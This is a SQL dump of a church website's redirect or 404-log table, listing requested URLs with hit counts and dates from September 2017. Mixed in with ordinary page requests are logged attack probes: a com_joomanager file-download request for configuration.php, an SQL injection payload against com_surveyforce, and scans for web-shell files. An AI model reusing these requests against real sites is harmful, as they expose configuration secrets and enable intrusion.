(6375, 'https://www.lifeoasisinternationalchurch.org/sample-page-3/', NULL, 'https://www.lifeoasisinternationalchurch.org/sample-page-3/', '', 2, 0, '2017-08-31 12:29:11', '0000-00-00 00:00:00', 301),
(6376, 'https://www.lifeoasisinternationalchurch.org/hello-world-3/', NULL, 'https://www.lifeoasisinternationalchurch.org/hello-world-3/', '', 2, 0, '2017-08-31 12:33:28', '0000-00-00 00:00:00', 301),
(6377, 'https://www.lifeoasisinternationalchurch.org/hello-world-2/', NULL, 'https://www.lifeoasisinternationalchurch.org/hello-world-2/', '', 2, 0, '2017-08-31 12:38:34', '0000-00-00 00:00:00', 301),
(6378, 'https://www.lifeoasisinternationalchurch.org/sample-page-2/', NULL, 'https://www.lifeoasisinternationalchurch.org/sample-page-2/', '', 2, 0, '2017-08-31 12:49:55', '0000-00-00 00:00:00', 301),
(6379, 'https://www.lifeoasisinternationalchurch.org/sample-page/', NULL, 'https://www.lifeoasisinternationalchurch.org/sample-page/', '', 2, 0, '2017-08-31 13:10:33', '0000-00-00 00:00:00', 301),
(6380, 'https://www.lifeoasisinternationalchurch.org/hello-world/', NULL, 'https://www.lifeoasisinternationalchurch.org/hello-world/', '', 2, 0, '2017-08-31 13:15:25', '0000-00-00 00:00:00', 301),
(6381, 'https://lifeoasisinternationalchurch.org/daughtersofdestiny', NULL, '', '', 21, 0, '2017-08-31 13:40:02', '0000-00-00 00:00:00', 301),
(6382, 'https://lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', NULL, 'http://lifeoasisinternationalchurch.org/featured-messages/2-uncategorised/47-videos', '', 104, 0, '2017-08-31 13:59:28', '0000-00-00 00:00:00', 301),
(6383, 'https://lifeoasisinternationalchurch.org/resources/livestreamng', NULL, '', '', 2, 0, '2017-08-31 23:34:18', '0000-00-00 00:00:00', 301),
(6384, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/', NULL, '', '', 9, 0, '2017-09-01 01:45:26', '0000-00-00 00:00:00', 301),
(6385, 'https://lifeoasisinternationalchurch.org/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-01 07:57:02', '0000-00-00 00:00:00', 301),
(6386, 'https://lifeoasisinternationalchurch.org/resources/live-streaming________________________________________________________________________________youtube', NULL, '', '', 2, 0, '2017-09-01 21:25:07', '0000-00-00 00:00:00', 301),
(6387, 'https://lifeoasisinternationalchurch.org/ rel=', NULL, '', '', 3, 0, '2017-09-02 00:37:17', '0000-00-00 00:00:00', 301),
(6388, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&tmpl=component&id=63&popupiniframe=true', NULL, '', '', 2, 0, '2017-09-02 01:24:17', '0000-00-00 00:00:00', 301),
(6389, 'https://www.lifeoasisinternationalchurch.org/18-loic/34-music', NULL, '', '', 58, 0, '2017-09-02 01:38:14', '0000-00-00 00:00:00', 301),
(6390, 'https://lifeoasisinternationalchurch.org/templates/rt_ionosphere/css/css-5cfcfda318d771d4268420865bce0950.php', NULL, 'http://lifeoasisinternationalchurch.org/resources/baptism', '', 6, 0, '2017-09-02 06:48:39', '0000-00-00 00:00:00', 301),
(6391, 'https://lifeoasisinternationalchurch.org/media/system/css/css-d88325c26fccffc16fdcbe6895c17519.php', NULL, 'http://lifeoasisinternationalchurch.org/resources/baptism', '', 11, 0, '2017-09-02 06:48:39', '0000-00-00 00:00:00', 301),
(6392, 'https://lifeoasisinternationalchurch.org/index.php/template-info-2/rev-oyenike-areogun', NULL, '', '', 27, 0, '2017-09-02 09:44:41', '0000-00-00 00:00:00', 301),
(6393, 'https://www.lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors', NULL, '', '', 30, 0, '2017-09-02 14:02:46', '0000-00-00 00:00:00', 301),
(6394, 'https://lifeoasisinternationalchurch.org/@@carer', NULL, '', '', 3, 0, '2017-09-02 14:06:41', '0000-00-00 00:00:00', 301),
(6395, 'https://lifeoasisinternationalchurch.org/@ @carer', NULL, '', '', 1, 0, '2017-09-02 14:08:15', '0000-00-00 00:00:00', 301),
(6396, 'https://lifeoasisinternationalchurch.org/eexpresso/events', NULL, '', '', 1, 0, '2017-09-02 16:22:44', '0000-00-00 00:00:00', 301),
(6397, 'https://lifeoasisinternationalchurch.org/eexpresso/wprdpress', NULL, '', '', 1, 0, '2017-09-02 16:23:56', '0000-00-00 00:00:00', 301),
(6398, 'https://lifeoasisinternationalchurch.org/wordpres/eexpresso/', NULL, '', '', 1, 0, '2017-09-02 16:24:16', '0000-00-00 00:00:00', 301),
(6399, 'https://lifeoasisinternationalchurch.org/eexpresso/wordpress', NULL, '', '', 2, 0, '2017-09-02 16:24:25', '0000-00-00 00:00:00', 301),
(6400, 'https://lifeoasisinternationalchurch.org/wordpress/', NULL, '', '', 2, 0, '2017-09-02 16:24:35', '0000-00-00 00:00:00', 301),
(6401, 'https://lifeoasisinternationalchurch.org/eexpresso/admin', NULL, '', '', 1, 0, '2017-09-02 16:25:35', '0000-00-00 00:00:00', 301),
(6402, 'https://lifeoasisinternationalchurch.org/eexpresso/wo', NULL, '', '', 1, 0, '2017-09-02 16:25:44', '0000-00-00 00:00:00', 301),
(6403, 'https://lifeoasisinternationalchurch.org/privat', NULL, '', '', 6, 0, '2017-09-02 20:26:21', '0000-00-00 00:00:00', 301),
(6404, 'https://lifeoasisinternationalchurch.org/index.php/template-info/music', NULL, '', '', 20, 0, '2017-09-03 08:05:44', '0000-00-00 00:00:00', 301),
(6405, 'https://lifeoasisinternationalchurch.org/template-info-2/the-church', NULL, '', '', 15, 0, '2017-09-03 08:06:03', '0000-00-00 00:00:00', 301),
(6406, 'https://lifeoasisinternationalchurch.org/kickstart.php', NULL, 'https://lifeoasisinternationalchurch.org/', '', 5, 0, '2017-09-03 09:40:05', '0000-00-00 00:00:00', 301),
(6407, 'https://142.4.21.132/index.php?option=com_joomanager&controller=details&task=download&path=index.php', NULL, '', '', 2, 0, '2017-09-04 10:08:25', '0000-00-00 00:00:00', 301),
(6408, 'https://lifeoasisinternationalchurch.org/terma/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/terma/popup-pomo.php', '', 2, 0, '2017-09-04 18:44:25', '0000-00-00 00:00:00', 301),
(6409, 'https://lifeoasisinternationalchurch.org/pressthis/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/pressthis/popup-pomo.php', '', 8, 0, '2017-09-04 18:49:46', '0000-00-00 00:00:00', 301),
(6410, 'https://lifeoasisinternationalchurch.org/gadsense/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/gadsense/popup-pomo.php', '', 3, 0, '2017-09-04 19:10:30', '0000-00-00 00:00:00', 301),
(6411, 'https://lifeoasisinternationalchurch.org/wp-temporary.php', NULL, 'lifeoasisinternationalchurch.org', '', 3, 0, '2017-09-04 19:18:40', '0000-00-00 00:00:00', 301),
(6412, 'https://lifeoasisinternationalchurch.org/paypalapi/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/paypalapi/popup-pomo.php', '', 5, 0, '2017-09-04 20:25:33', '0000-00-00 00:00:00', 301),
(6413, 'https://lifeoasisinternationalchurch.org/ogone/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/ogone/popup-pomo.php', '', 6, 0, '2017-09-04 20:27:15', '0000-00-00 00:00:00', 301),
(6414, 'https://lifeoasisinternationalchurch.org/postnewa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/postnewa/popup-pomo.php', '', 10, 0, '2017-09-04 20:52:17', '0000-00-00 00:00:00', 301),
(6415, 'https://lifeoasisinternationalchurch.org/wp-inc.php', NULL, 'http://lifeoasisinternationalchurch.org/wp-inc.php', '', 3, 0, '2017-09-04 20:56:10', '0000-00-00 00:00:00', 301),
(6416, 'https://lifeoasisinternationalchurch.org/barabaschool.ru/scriptsa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/barabaschool.ru/scriptsa/popup-pomo.php', '', 2, 0, '2017-09-04 21:23:21', '0000-00-00 00:00:00', 301),
(6417, 'https://www.lifeoasisinternationalchurch.org/index.php/146-day2', NULL, '', '', 12, 0, '2017-09-04 22:40:17', '0000-00-00 00:00:00', 301),
(6418, 'https://www.lifeoasisinternationalchurch.org/index.php/213-2015-day-39', NULL, '', '', 14, 0, '2017-09-04 22:40:58', '0000-00-00 00:00:00', 301),
(6419, 'https://lifeoasisinternationalchurch.org/updatecorea/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/updatecorea/popup-pomo.php', '', 8, 0, '2017-09-04 22:43:58', '0000-00-00 00:00:00', 301),
(6420, 'https://lifeoasisinternationalchurch.org/maint/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/maint/popup-pomo.php', '', 10, 0, '2017-09-04 23:37:48', '0000-00-00 00:00:00', 301),
(6421, 'https://lifeoasisinternationalchurch.org/wp-blog-mail.php', NULL, 'http://lifeoasisinternationalchurch.org/wp-blog-mail.php', '', 3, 0, '2017-09-05 00:53:21', '0000-00-00 00:00:00', 301),
(6422, 'https://lifeoasisinternationalchurch.org/setupconfiga/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/setupconfiga/popup-pomo.php', '', 5, 0, '2017-09-05 00:53:26', '0000-00-00 00:00:00', 301),
(6423, 'https://lifeoasisinternationalchurch.org/phpmail/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/phpmail/popup-pomo.php', '', 6, 0, '2017-09-05 02:31:31', '0000-00-00 00:00:00', 301),
(6424, 'https://lifeoasisinternationalchurch.org/toolsa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/toolsa/popup-pomo.php', '', 3, 0, '2017-09-05 03:27:55', '0000-00-00 00:00:00', 301),
(6425, 'https://lifeoasisinternationalchurch.org/event/asom', NULL, '', '', 51, 0, '2017-09-05 03:31:19', '0000-00-00 00:00:00', 301),
(6426, 'https://lifeoasisinternationalchurch.org/hipay/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/hipay/popup-pomo.php', '', 1, 0, '2017-09-05 03:46:03', '0000-00-00 00:00:00', 301),
(6427, 'https://lifeoasisinternationalchurch.org/general/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/general/popup-pomo.php', '', 10, 0, '2017-09-05 03:47:25', '0000-00-00 00:00:00', 301),
(6428, 'https://lifeoasisinternationalchurch.org/networksa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/networksa/popup-pomo.php', '', 2, 0, '2017-09-05 05:05:49', '0000-00-00 00:00:00', 301),
(6429, 'https://lifeoasisinternationalchurch.org/scriptsa/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/scriptsa/popup-pomo.php', '', 13, 0, '2017-09-05 05:09:27', '0000-00-00 00:00:00', 301),
(6430, 'https://lifeoasisinternationalchurch.org/mondialrelay/popup-pomo.php', NULL, 'http://lifeoasisinternationalchurch.org/mondialrelay/popup-pomo.php', '', 2, 0, '2017-09-05 05:19:57', '0000-00-00 00:00:00', 301),
(6431, 'https://lifeoasisinternationalchurch.org/wp-config.lib.php', NULL, 'http://lifeoasisinternationalchurch.org/wp-config.lib.php', '', 2, 0, '2017-09-05 05:29:47', '0000-00-00 00:00:00', 301),
(6432, 'https://lifeoasisinternationalchurch.org/ministry.html', NULL, '', '', 7, 0, '2017-09-05 08:27:38', '0000-00-00 00:00:00', 301),
(6433, 'https://lifeoasisinternationalchurch.org/modx.php', NULL, 'lifeoasisinternationalchurch.org', '', 5, 0, '2017-09-05 10:36:11', '0000-00-00 00:00:00', 301),
(6434, 'https://lifeoasisinternationalchurch.org/news_parser.class.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-05 10:40:41', '0000-00-00 00:00:00', 301),
(6435, 'https://lifeoasisinternationalchurch.org/cache.php?blog_id=1', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-05 10:40:49', '0000-00-00 00:00:00', 301),
(6436, 'https://lifeoasisinternationalchurch.org/xmlrppc.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-05 10:43:19', '0000-00-00 00:00:00', 301),
(6437, 'https://lifeoasisinternationalchurch.org/robots.php?blog_id=1', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-05 10:43:34', '0000-00-00 00:00:00', 301),
(6438, 'https://lifeoasisinternationalchurch.org/resources/', NULL, '', '', 52, 0, '2017-09-05 12:35:24', '0000-00-00 00:00:00', 301),
(6439, 'https://lifeoasisinternationalchurch.org/prayer/52-prophetic-words-for-day-4', NULL, '', '', 12, 0, '2017-09-05 14:29:02', '0000-00-00 00:00:00', 301),
(6440, 'https://lifeoasisinternationalchurch.org/index.php?option=com_adsmanager&task=upload&tmpl=component', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-09-05 15:38:52', '0000-00-00 00:00:00', 301),
(6441, 'https://www.lifeoasisinternationalchurch.org/index.php/212-2015-day-38', NULL, '', '', 16, 0, '2017-09-05 16:25:55', '0000-00-00 00:00:00', 301),
(6442, 'https://www.lifeoasisinternationalchurch.org/index.php/204-2015-day-30', NULL, '', '', 15, 0, '2017-09-05 16:38:12', '0000-00-00 00:00:00', 301),
(6443, 'https://www.lifeoasisinternationalchurch.org/index.php/210-2015-day-36', NULL, '', '', 15, 0, '2017-09-05 16:51:27', '0000-00-00 00:00:00', 301),
(6444, 'https://www.lifeoasisinternationalchurch.org/index.php/214-2015-day-21', NULL, '', '', 19, 0, '2017-09-05 16:54:00', '0000-00-00 00:00:00', 301),
(6445, 'https://www.lifeoasisinternationalchurch.org/index.php/206-2015-day-32', NULL, '', '', 14, 0, '2017-09-05 16:54:18', '0000-00-00 00:00:00', 301),
(6446, 'https://lifeoasisinternationalchurch.org/feedback.php', NULL, '', '', 30, 0, '2017-09-05 16:58:16', '0000-00-00 00:00:00', 301),
(6447, 'https://www.lifeoasisinternationalchurch.org/index.php/208-2015-day-34', NULL, '', '', 16, 0, '2017-09-05 17:00:23', '0000-00-00 00:00:00', 301),
(6448, 'https://www.lifeoasisinternationalchurch.org/index.php/211-2015-day-37', NULL, '', '', 17, 0, '2017-09-05 17:04:41', '0000-00-00 00:00:00', 301),
(6449, 'https://www.lifeoasisinternationalchurch.org/index.php/203-2015-day-29', NULL, '', '', 14, 0, '2017-09-05 17:09:36', '0000-00-00 00:00:00', 301),
(6450, 'https://www.lifeoasisinternationalchurch.org/index.php/190-2015-day-14', NULL, '', '', 17, 0, '2017-09-05 17:13:34', '0000-00-00 00:00:00', 301),
(6451, 'https://www.lifeoasisinternationalchurch.org/index.php/216-2015-day-28', NULL, '', '', 14, 0, '2017-09-05 17:22:35', '0000-00-00 00:00:00', 301),
(6452, 'https://www.lifeoasisinternationalchurch.org/index.php/215-2015-day-13-1', NULL, '', '', 13, 0, '2017-09-05 17:31:48', '0000-00-00 00:00:00', 301),
(6453, 'https://www.lifeoasisinternationalchurch.org/index.php/134-prayer-focus-for-day-9', NULL, '', '', 14, 0, '2017-09-05 17:35:34', '0000-00-00 00:00:00', 301),
(6454, 'https://www.lifeoasisinternationalchurch.org/index.php/257-day-8-of-21-days-fasting-and-prayer-october', NULL, '', '', 25, 0, '2017-09-05 17:39:46', '0000-00-00 00:00:00', 301),
(6455, 'https://www.lifeoasisinternationalchurch.org/index.php/258-day-9-of-21-days-fasting-and-prayer-october', NULL, '', '', 27, 0, '2017-09-05 17:40:30', '0000-00-00 00:00:00', 301),
(6456, 'https://www.lifeoasisinternationalchurch.org/index.php/254-day-19-of-22-days-fasting-and-prayer-october', NULL, '', '', 37, 0, '2017-09-05 17:43:28', '0000-00-00 00:00:00', 301),
(6457, 'https://www.lifeoasisinternationalchurch.org/index.php/259-day-13-of-21-days-fasting-and-prayer-october', NULL, '', '', 32, 0, '2017-09-05 17:51:38', '0000-00-00 00:00:00', 301),
(6458, 'https://www.lifeoasisinternationalchurch.org/index.php/250-day-15-of-21-days-fasting-and-prayer-october', NULL, '', '', 36, 0, '2017-09-05 18:00:36', '0000-00-00 00:00:00', 301),
(6459, 'https://www.lifeoasisinternationalchurch.org/index.php/246-day-10-of-21-days-fasting-and-prayer-october', NULL, '', '', 35, 0, '2017-09-05 18:04:56', '0000-00-00 00:00:00', 301),
(6460, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/images/demo/video/envato_sting.mp4', NULL, '', '', 1, 0, '2017-09-05 19:06:01', '0000-00-00 00:00:00', 301),
(6461, 'https://www.lifeoasisinternationalchurch.org/component/k2/item', NULL, '', '', 3, 0, '2017-09-05 21:53:18', '0000-00-00 00:00:00', 301),
(6462, 'https://www.lifeoasisinternationalchurch.org/component/k2', NULL, '', '', 1, 0, '2017-09-05 21:53:30', '0000-00-00 00:00:00', 301),
(6463, 'https://www.lifeoasisinternationalchurch.org/component', NULL, '', '', 1, 0, '2017-09-05 21:53:39', '0000-00-00 00:00:00', 301),
(6464, 'https://www.lifeoasisinternationalchurch.org/index.php/157-day3', NULL, '', '', 16, 0, '2017-09-05 23:03:56', '0000-00-00 00:00:00', 301),
(6465, 'https://www.lifeoasisinternationalchurch.org/index.php/59-2014-1', NULL, '', '', 26, 0, '2017-09-05 23:07:20', '0000-00-00 00:00:00', 301),
(6466, 'https://lifeoasisinternationalchurch.org/about-us/dream-centre-ordained-pastors', NULL, '', '', 64, 0, '2017-09-06 05:05:46', '0000-00-00 00:00:00', 301),
(6467, 'https://lifeoasisinternationalchurch.org/prayer/62-day-10', NULL, '', '', 6, 0, '2017-09-06 07:33:20', '0000-00-00 00:00:00', 301),
(6468, 'https://www.lifeoasisinternationalchurch.org/about-us/our-service-schedule', NULL, '', '', 163, 0, '2017-09-06 13:01:30', '0000-00-00 00:00:00', 301),
(6469, 'https://lifeoasisinternationalchurch.org/index.php/joomla/other-components/registration-form', NULL, '', '', 83, 0, '2017-09-06 14:23:34', '0000-00-00 00:00:00', 301),
(6470, 'https://lifeoasisinternationalchurch.org/index.php?option=com_community&view=register', NULL, '', '', 17, 0, '2017-09-06 14:23:39', '0000-00-00 00:00:00', 301),
(6471, 'https://lifeoasisinternationalchurch.org/index.php/component/user/register.html', NULL, '', '', 83, 0, '2017-09-06 14:23:42', '0000-00-00 00:00:00', 301),
(6472, 'https://lifeoasisinternationalchurch.org/index.php/registration/registers', NULL, '', '', 83, 0, '2017-09-06 14:23:43', '0000-00-00 00:00:00', 301),
(6473, 'https://lifeoasisinternationalchurch.org/registratsiya/registers', NULL, '', '', 83, 0, '2017-09-06 14:23:46', '0000-00-00 00:00:00', 301),
(6474, 'https://lifeoasisinternationalchurch.org/component/comprofiler/registers.html', NULL, '', '', 90, 0, '2017-09-06 14:23:48', '0000-00-00 00:00:00', 301),
(6475, 'https://lifeoasisinternationalchurch.org/user/registration', NULL, '', '', 83, 0, '2017-09-06 14:23:50', '0000-00-00 00:00:00', 301),
(6476, 'https://lifeoasisinternationalchurch.org/index.php?option=com_secureregistration&task=register', NULL, '', '', 16, 0, '2017-09-06 14:23:54', '0000-00-00 00:00:00', 301),
(6477, 'https://lifeoasisinternationalchurch.org/component/option,com_comprofiler/task,registers/', NULL, '', '', 83, 0, '2017-09-06 14:24:00', '0000-00-00 00:00:00', 301),
(6478, 'https://lifeoasisinternationalchurch.org/index.php?option=com_registration&task=register', NULL, '', '', 16, 0, '2017-09-06 14:24:02', '0000-00-00 00:00:00', 301),
(6479, 'https://lifeoasisinternationalchurch.org/index.php?option=com_joocm&view=register', NULL, '', '', 16, 0, '2017-09-06 14:24:08', '0000-00-00 00:00:00', 301),
(6480, 'https://lifeoasisinternationalchurch.org/index.php?option=com_easysocial&view=registration', NULL, '', '', 31, 0, '2017-09-06 14:24:10', '0000-00-00 00:00:00', 301),
(6481, 'https://www.lifeoasisinternationalchurch.org/18-loic/44-programme', NULL, '', '', 11, 0, '2017-09-06 15:17:33', '0000-00-00 00:00:00', 301),
(6482, 'https://lifeoasisinternationalchurch.org/resources/livestreaming', NULL, '', '', 2, 0, '2017-09-06 15:46:17', '0000-00-00 00:00:00', 301),
(6483, 'https://lifeoasisinternationalchurch.org/streaning', NULL, '', '', 3, 0, '2017-09-06 16:08:29', '0000-00-00 00:00:00', 301),
(6484, 'https://www.lifeoasisinternationalchurch.org/index.php/256-day-21-of-21-days-fasting-and-prayer-october', NULL, '', '', 36, 0, '2017-09-06 16:09:23', '0000-00-00 00:00:00', 301),
(6485, 'https://www.lifeoasisinternationalchurch.org/index.php/247-day-11-of-21-days-fasting-and-prayer-october', NULL, '', '', 27, 0, '2017-09-06 16:18:07', '0000-00-00 00:00:00', 301),
(6486, 'https://www.lifeoasisinternationalchurch.org/index.php/251-day-16-of-21-days-fasting-and-prayer-october', NULL, '', '', 30, 0, '2017-09-06 16:18:40', '0000-00-00 00:00:00', 301),
(6487, 'https://www.lifeoasisinternationalchurch.org/index.php/249-day-14-of-21-days-fasting-and-prayer-october', NULL, '', '', 36, 0, '2017-09-06 16:18:49', '0000-00-00 00:00:00', 301),
(6488, 'https://www.lifeoasisinternationalchurch.org/index.php/255-day-20-of-21-days-fasting-and-prayer-october', NULL, '', '', 26, 0, '2017-09-06 16:23:43', '0000-00-00 00:00:00', 301),
(6489, 'https://www.lifeoasisinternationalchurch.org/index.php/245-day-6-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 29, 0, '2017-09-06 16:24:53', '0000-00-00 00:00:00', 301),
(6490, 'https://www.lifeoasisinternationalchurch.org/index.php/252-day-16-of-21-days-fasting-and-prayer-october-2', NULL, '', '', 30, 0, '2017-09-06 16:25:10', '0000-00-00 00:00:00', 301),
(6491, 'https://www.lifeoasisinternationalchurch.org/index.php/253-day-16-of-21-days-fasting-and-prayer-october-3', NULL, '', '', 24, 0, '2017-09-06 16:28:59', '0000-00-00 00:00:00', 301),
(6492, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/52-prayer-a-fasting-day-4', NULL, '', '', 16, 0, '2017-09-06 16:29:13', '0000-00-00 00:00:00', 301),
(6493, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/44-prayer-a-fasting-day-33', NULL, '', '', 13, 0, '2017-09-06 16:29:41', '0000-00-00 00:00:00', 301),
(6494, 'https://lifeoasisinternationalchurch.org/struts2-rest-showcase/orders/3', NULL, '', '', 1, 0, '2017-09-06 20:46:54', '0000-00-00 00:00:00', 301),
(6495, 'https://142.4.21.132/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=1\' and updatexml(1,concat(0x7e,(select md5(123)),0x7e),1)--+', NULL, '', '', 2, 0, '2017-09-07 04:38:39', '0000-00-00 00:00:00', 301),
(6496, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=login', NULL, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_user&view=login', '', 4, 0, '2017-09-07 20:04:06', '0000-00-00 00:00:00', 301),
(6497, 'https://www.lifeoasisinternationalchurch.org/index.php/172-day8', NULL, '', '', 15, 0, '2017-09-07 22:00:28', '0000-00-00 00:00:00', 301),
(6498, 'https://www.lifeoasisinternationalchurch.org/index.php/135-day1', NULL, '', '', 17, 0, '2017-09-07 22:00:53', '0000-00-00 00:00:00', 301),
(6499, 'https://www.lifeoasisinternationalchurch.org/index.php/173-day-9', NULL, '', '', 16, 0, '2017-09-07 22:00:54', '0000-00-00 00:00:00', 301),
(6500, 'https://www.lifeoasisinternationalchurch.org/index.php/131-20148', NULL, '', '', 21, 0, '2017-09-07 22:00:59', '0000-00-00 00:00:00', 301),
(6501, 'https://www.lifeoasisinternationalchurch.org/index.php/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&itemid=189', NULL, '', '', 10, 0, '2017-09-08 00:25:13', '0000-00-00 00:00:00', 301),
(6502, 'https://www.lifeoasisinternationalchurch.org/component/content/category/18-loic', NULL, '', '', 15, 0, '2017-09-08 03:11:35', '0000-00-00 00:00:00', 301),
(6503, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 15, 0, '2017-09-08 06:26:42', '0000-00-00 00:00:00', 301),
(6504, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermons/0/0?start=20', NULL, '', '', 2, 0, '2017-09-08 10:25:43', '0000-00-00 00:00:00', 301),
(6505, 'https://lifeoasisinternationalchurch.org/message.html', NULL, '', '', 21, 0, '2017-09-08 11:02:17', '0000-00-00 00:00:00', 301),
(6506, 'https://www.lifeoasisinternationalchurch.org/estore', NULL, '', '', 20, 0, '2017-09-08 11:40:55', '0000-00-00 00:00:00', 301),
(6507, 'https://www.lifeoasisinternationalchurch.org/index.php/80-2014-2', NULL, '', '', 16, 0, '2017-09-08 13:29:12', '0000-00-00 00:00:00', 301),
(6508, 'https://www.lifeoasisinternationalchurch.org/index.php/166-day-38', NULL, '', '', 13, 0, '2017-09-08 13:32:55', '0000-00-00 00:00:00', 301),
(6509, 'https://www.lifeoasisinternationalchurch.org/index.php/160-day-32', NULL, '', '', 16, 0, '2017-09-08 13:36:01', '0000-00-00 00:00:00', 301),
(6510, 'https://www.lifeoasisinternationalchurch.org/index.php/152-day-25', NULL, '', '', 12, 0, '2017-09-08 13:43:00', '0000-00-00 00:00:00', 301),
(6511, 'https://www.lifeoasisinternationalchurch.org/index.php/164-day-36', NULL, '', '', 15, 0, '2017-09-08 13:44:43', '0000-00-00 00:00:00', 301),
(6512, 'https://www.lifeoasisinternationalchurch.org/index.php/155-day-28', NULL, '', '', 12, 0, '2017-09-08 13:51:58', '0000-00-00 00:00:00', 301),
(6513, 'https://www.lifeoasisinternationalchurch.org/template-info/media-outreach', NULL, '', '', 8, 0, '2017-09-08 14:55:23', '0000-00-00 00:00:00', 301),
(6514, 'https://www.lifeoasisinternationalchurch.org/web/', NULL, 'http://m.facebook.com', '', 9, 0, '2017-09-08 22:39:17', '0000-00-00 00:00:00', 301),
(6515, 'https://www.lifeoasisinternationalchurch.org/streamin', NULL, '', '', 46, 0, '2017-09-09 02:24:49', '0000-00-00 00:00:00', 301),
(6516, 'https://www.lifeoasisinternationalchurch.org/life streaming', NULL, '', '', 3, 0, '2017-09-09 05:31:41', '0000-00-00 00:00:00', 301),
(6517, 'https://lifeoasisinternationalchurch.org/template-info/ljmti', NULL, '', '', 7, 0, '2017-09-09 05:32:06', '0000-00-00 00:00:00', 301),
(6518, 'https://lifeoasisinternationalchurch.org/branch', NULL, '', '', 1, 0, '2017-09-09 08:57:04', '0000-00-00 00:00:00', 301),
(6519, 'https://www.lifeoasisinternationalchurch.org/index.php/11-kindom-builder/47-prayer-a-fasting-day-36', NULL, '', '', 20, 0, '2017-09-09 11:08:32', '0000-00-00 00:00:00', 301),
(6520, 'https://www.lifeoasisinternationalchurch.org/admin', NULL, '', '', 69, 0, '2017-09-09 19:40:48', '0000-00-00 00:00:00', 301),
(6521, 'https://lifeoasisinternationalchurch.org/magento_version', NULL, '', '', 7, 0, '2017-09-09 20:49:11', '0000-00-00 00:00:00', 301),
(6522, 'https://lifeoasisinternationalchurch.org/rest/v1', NULL, '', '', 1, 0, '2017-09-09 20:49:11', '0000-00-00 00:00:00', 301),
(6523, 'https://www.lifeoasisinternationalchurch.org/administration.html', NULL, '', '', 23, 0, '2017-09-10 05:13:05', '0000-00-00 00:00:00', 301),
(6524, 'https://www.lifeoasisinternationalchurch.org/resources/live-s', NULL, '', '', 2, 0, '2017-09-10 08:04:00', '0000-00-00 00:00:00', 301),
(6525, 'https://www.lifeoasisinternationalchurch.org/about-us/the-church-2', NULL, '', '', 23, 0, '2017-09-10 10:23:50', '0000-00-00 00:00:00', 301),
(6526, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/36-prayer-a-fasting-day-27', NULL, '', '', 14, 0, '2017-09-10 11:22:31', '0000-00-00 00:00:00', 301),
(6527, 'https://www.lifeoasisinternationalchurch.org/minister/hotel', NULL, '', '', 8, 0, '2017-09-10 11:23:39', '0000-00-00 00:00:00', 301),
(6528, 'https://www.lifeoasisinternationalchurch.org/privte', NULL, '', '', 2, 0, '2017-09-10 12:26:10', '0000-00-00 00:00:00', 301),
(6529, 'https://lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 100, 0, '2017-09-10 14:11:21', '0000-00-00 00:00:00', 301),
(6530, 'https://lifeoasisinternationalchurch.org/template-info/outreach', NULL, '', '', 15, 0, '2017-09-10 15:23:06', '0000-00-00 00:00:00', 301),
(6531, 'https://www.lifeoasisinternationalchurch.org/loicgallery/modules/remote/', NULL, '', '', 6, 0, '2017-09-10 16:02:13', '0000-00-00 00:00:00', 301),
(6532, 'https://www.lifeoasisinternationalchurch.org/template-info/gin', NULL, '', '', 9, 0, '2017-09-10 16:04:51', '0000-00-00 00:00:00', 301),
(6533, 'https://www.lifeoasisinternationalchurch.org/resources/private streaming', NULL, '', '', 4, 0, '2017-09-10 22:54:10', '0000-00-00 00:00:00', 301),
(6534, 'https://www.lifeoasisinternationalchurch.org/feedback.html', NULL, '', '', 18, 0, '2017-09-11 01:51:11', '0000-00-00 00:00:00', 301),
(6535, 'https://www.lifeoasisinternationalchurch.org/template-info/musci', NULL, '', '', 14, 0, '2017-09-11 04:44:06', '0000-00-00 00:00:00', 301),
(6536, 'https://www.lifeoasisinternationalchurch.org/2012-11-09-09-57-10/father-s-heart', NULL, '', '', 6, 0, '2017-09-11 07:41:48', '0000-00-00 00:00:00', 301),
(6537, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/', NULL, '', '', 7, 0, '2017-09-11 09:00:52', '0000-00-00 00:00:00', 301),
